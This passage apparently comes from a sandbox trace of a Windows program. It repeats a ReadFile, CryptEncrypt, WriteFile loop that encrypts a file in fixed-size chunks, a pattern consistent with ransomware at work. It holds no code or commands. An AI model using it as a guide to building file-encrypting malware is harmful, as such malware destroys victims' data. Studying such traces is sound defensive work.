Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.500] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.500] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.500] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.501] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.501] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.501] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.501] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.501] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.501] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.501] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.501] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.501] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.501] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.502] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.502] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.502] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.502] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.502] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.502] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.502] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.502] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.502] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.502] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.502] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.503] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.503] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.503] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.503] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.503] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.503] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.503] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.503] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.503] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.503] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.503] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.504] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.504] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.504] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.504] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.504] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.504] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.504] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.504] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.504] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.504] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.504] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.504] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.505] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.505] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.505] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.505] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.505] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.505] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.505] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.505] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.505] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.505] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.505] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.506] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.506] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.506] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.506] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.506] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.506] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.506] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.506] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.506] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.506] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.506] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.506] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.507] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.507] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.507] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.507] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.507] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.507] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.507] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.507] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.507] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.507] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.507] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.507] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.508] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.508] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.508] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.508] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.508] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.508] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.508] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.508] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.508] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.508] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.508] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.508] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.508] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.508] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.508] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.508] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5cda8, 